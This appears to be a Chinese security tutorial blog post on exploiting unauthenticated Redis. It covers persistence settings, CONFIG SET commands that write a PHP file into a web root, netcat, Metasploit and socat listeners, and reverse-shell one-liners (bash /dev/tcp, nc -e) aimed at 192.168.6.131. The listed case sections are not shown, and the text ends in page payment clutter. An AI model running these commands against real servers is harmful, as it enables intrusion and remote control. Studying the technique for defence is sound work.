网安-中间件-Redis未授权访问漏洞

目录

Redis

Redis持久化

动态修改配置

使用反弹连接的情况

常见监听端口的方式

常见建立反弹连接的方式

流程

Linux crontab

cron文件存储路径

利用Redis实现攻击

1.webshell提权案例

2.定时任务shell反弹案例

3.SSH Key getshell案例

​编辑Redis其他利用方式

Redis加固


Redis

1.数据类型丰富,应用场景广泛
2.纯内存的数据结构,读写速度快
3.功能特性丰富(持久化、事务、pipeline、多语言支持、集群分布式)

Redis持久化

RDB Redis DataBase (默认)
AOF Append Only File

配置:
1.save 3600 1 #自动触发规则
2.dbfilename dump.rdb #文件名
3.dir ./ #存储路径

手动触发保存命令:save / bgsave

动态修改配置

config set:动态修改配置,重启以后失效
config set dir /var/www/html
config set dbfilename redis.php

使用反弹连接的情况

1.内网,私有IP
2.IP动态变化
3.6379端口不允许入方向
4.一句话木马被杀软删除

常见监听端口的方式

类型 命令
netcat nc -lvnp 8888
msf msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.6.131
set lport 8888
run
socat  socat TCP-LISTEN:8888 - (kali)

常见建立反弹连接的方式

类型 命令
Linux bash bash -i >& /dev/tcp/192.168.6.131/8888 0>&1
netcat nc -e /bin/bash 192.168.6.131 8888
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值